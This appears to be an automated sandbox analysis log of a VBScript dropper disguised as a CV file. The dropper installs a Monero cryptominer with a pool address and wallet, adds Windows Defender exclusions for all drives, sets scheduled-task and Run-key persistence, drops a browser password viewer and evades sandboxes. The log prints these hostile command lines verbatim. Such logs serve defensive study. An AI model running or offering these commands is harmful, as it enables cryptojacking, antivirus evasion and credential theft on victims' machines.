Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Users\Public\7g.exe	Code function: 11_2_003C2962 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
Source: C:\Users\Public\7g.exe	Code function: 11_2_003B8FE9 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1

Jump to behavior

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B8F28 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source:	Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\curriculum_v", "", "runas", "1");
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateTextFile("C:\Users\Public\computer_7", "true");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IShellDispatch6.ShellExecute("cmd.exe", "/c powershell -C "Add-MpPreference -Exc", "", "runas", "0");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");I

Source: C:\Users\Public\7g.exe	Code function: 11_2_0041F1B0 push eax; ret
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041F530 push eax; ret

Source: C:\Users\Public\7g.exe

Code function: 11_2_003EA7A4 GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,

Source: 7zr[1].exe.5.dr	Static PE information: section name: .sxdata
Source: 7g.exe.5.dr	Static PE information: section name: .sxdata
Source: mservice.exe.11.dr	Static PE information: section name: _RANDOMX
Source: mservice.exe.11.dr	Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr	Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr	Static PE information: section name: _RDATA

Source: go.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e524
Source: 7zr[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x9a24c
Source: mservice.exe.11.dr	Static PE information: real checksum: 0x496ae1 should be: 0x48da3c
Source: 7g.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x9a24c

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\Public\7g.exe

File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\mservice.exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\ps.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\Public\7g.exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\go.exe	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\7g.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"

Drops PE files to the user root directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\7g.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\curriculum_vitae-copie.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\WindowsUpdate\mservice.exe

System information queried: FirmwareTableInformation

Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'

Potential evasive VBS script found (sleep loop)

Source: C:\Users\Public\7g.exe	Dropped file: Do Until .NameSpace(zipFile).Items.Count = _ WScript.Sleep 1000			Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped file: do while 1 wscript.sleep(10000)			Jump to dropped file

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

